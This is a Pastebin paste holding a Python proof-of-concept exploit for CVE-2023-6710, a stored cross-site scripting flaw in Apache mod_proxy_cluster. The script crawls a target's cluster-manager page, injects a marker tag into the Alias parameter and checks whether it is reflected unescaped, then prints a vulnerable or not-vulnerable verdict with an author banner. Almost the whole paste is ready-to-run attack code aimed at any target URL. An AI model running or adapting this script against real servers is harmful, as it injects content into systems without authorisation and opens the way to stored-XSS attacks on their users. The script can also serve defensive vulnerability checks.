API tools faq
paste
Advertisement
FlyFar

Apache mod_proxy_cluster - Stored XSS

FlyFar
May 15th, 2024
774
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.63 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. import requests
  2. import argparse
  3. from bs4 import BeautifulSoup
  4. from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
  5. from requests.exceptions import RequestException
  6.  
  7. class Colors:
  8.     RED = '\033[91m'
  9.     GREEN = '\033[1;49;92m'
  10.     RESET = '\033[0m'
  11.  
  12. def get_cluster_manager_url(base_url, path):
  13.     print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)
  14.     try:
  15.         response = requests.get(base_url + path)
  16.         response.raise_for_status()
  17.     except requests.exceptions.RequestException as e:
  18.         print(Colors.RED + f"Error: {e}" + Colors.RESET)
  19.         return None
  20.  
  21.     print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)
  22.  
  23.     if response.status_code == 200:
  24.         print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)
  25.         # Use BeautifulSoup to parse the HTML content
  26.         soup = BeautifulSoup(response.text, 'html.parser')
  27.  
  28.         # Find all 'a' tags with 'href' attribute
  29.         all_links = soup.find_all('a', href=True)
  30.  
  31.         # Search for the link containing the Alias parameter in the href attribute
  32.         cluster_manager_url = None
  33.         for link in all_links:
  34.             parsed_url = urlparse(link['href'])
  35.             query_params = parse_qs(parsed_url.query)
  36.             alias_value = query_params.get('Alias', [None])[0]
  37.  
  38.             if alias_value:
  39.                 print(Colors.GREEN + f"Alias value found" + Colors.RESET)
  40.                 cluster_manager_url = link['href']
  41.                 break
  42.  
  43.         if cluster_manager_url:
  44.             print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)
  45.             return cluster_manager_url
  46.         else:
  47.             print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)
  48.             return None
  49.  
  50.     print(Colors.RED + f"Error: Unable to get the initial step on {base_url}")
  51.     return None
  52.  
  53. def update_alias_value(url):
  54.     parsed_url = urlparse(url)
  55.     query_params = parse_qs(parsed_url.query, keep_blank_values=True)
  56.     query_params['Alias'] = ["<DedSec-47>"]
  57.     updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))
  58.     print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)
  59.     return updated_url
  60.  
  61. def check_response_for_value(url, check_value):
  62.     response = requests.get(url)
  63.     if check_value in response.text:
  64.         print(Colors.RED + "Website is vulnerable POC by :")
  65.         print(Colors.GREEN + """
  66.          ____           _ ____                  _  _ _____
  67.         |  _ \ ___  __| / ___|  ___  ___      | || |___  |
  68.         | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || |  / /
  69.         | |_| |  __/ (_| |___) |  __/ (_  |____|__  | / /  
  70.         |____/ \___|\__,_|____/ \___|\___|        |_|/_/  
  71.                                     github.com/DedSec-47    """)
  72.     else:
  73.         print(Colors.GREEN + "Website is not vulnerable POC by :")
  74.         print(Colors.GREEN + """
  75.          ____           _ ____                  _  _ _____
  76.         |  _ \ ___  __| / ___|  ___  ___      | || |___  |
  77.         | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || |  / /
  78.         | |_| |  __/ (_| |___) |  __/ (_  |____|__  | / /  
  79.         |____/ \___|\__,_|____/ \___|\___|        |_|/_/  
  80.                                     github.com/DedSec-47    """)
  81.  
  82. def main():
  83.     # Create a command-line argument parser
  84.     parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")
  85.  
  86.     # Add a command-line argument for the target (-t/--target)
  87.     parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)
  88.  
  89.     # Add a command-line argument for the URL path (-u/--url)
  90.     parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)
  91.  
  92.     # Parse the command-line arguments
  93.     args = parser.parse_args()
  94.  
  95.     # Get the cluster manager URL from the specified website
  96.     cluster_manager_url = get_cluster_manager_url(args.target, args.url)
  97.  
  98.     # Check if the cluster manager URL is found
  99.     if cluster_manager_url:
  100.         # Modify the URL by adding the cluster manager value
  101.         modified_url = args.target + cluster_manager_url
  102.         modified_url = update_alias_value(args.target + cluster_manager_url)
  103.         print(Colors.GREEN + "Check executed successfully" + Colors.RESET)
  104.  
  105.         # Check the response for the value "<DedSec-47>"
  106.         check_response_for_value(modified_url, "<DedSec-47>")
  107.  
  108. if __name__ == "__main__":
  109.     main()
  110.            
Tags: Exploit CVE Vulnerability XSS Apache mod_proxy_cluster Stored XSS
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!